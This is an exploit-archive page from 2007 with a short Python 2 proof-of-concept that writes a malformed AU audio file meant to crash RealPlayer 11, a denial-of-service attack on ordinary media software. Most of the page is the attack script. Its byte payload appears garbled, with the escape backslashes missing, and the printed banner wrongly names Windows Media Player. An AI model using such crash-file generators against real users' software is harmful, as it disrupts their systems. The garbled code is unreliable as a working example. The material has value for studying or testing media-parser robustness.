RealPlayer 11 Malformed AU File Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RealPlayer 11 Malformed AU File Denial of Service Exploit
# Published : 2007-12-01
# Author : NtWaK0
# Previous Title : Apple Mac OS X 10.5.0 (leopard) vpnd Remote Denial of Service PoC
# Next Title : Windows Media Player AIFF Divide By Zero Exception DoS PoC

#RealPlayer 11 local/remote DoS by A.Sawan aka NtWaK0 and A.Hariri aka nophie

import sys
import os

head = 
("x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01"+
"x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E"+     
"x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22"+       
"x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+
"x00x00x00x00x00x00x00x00x66x66x66x00")

print "[x] Windows Media Player 11 DoS by Adonis a.K.a NtWaK0 and Abed aka Nophie."

try:
   f = open("test.au",'w')
except IOError, e:
    print "Unable to open file ", e
    sys.exit(0)

print "[x] File sucessfully opened for writing."
try:
   f.write(head)
except IOError, e:
    print "Unable to write to file ", e
    sys.exit(0)
print "[x] File successfully written."
f.close()
print "[x] Open test.au with RealPlayer 11."

# www.Syue.com [2007-12-01]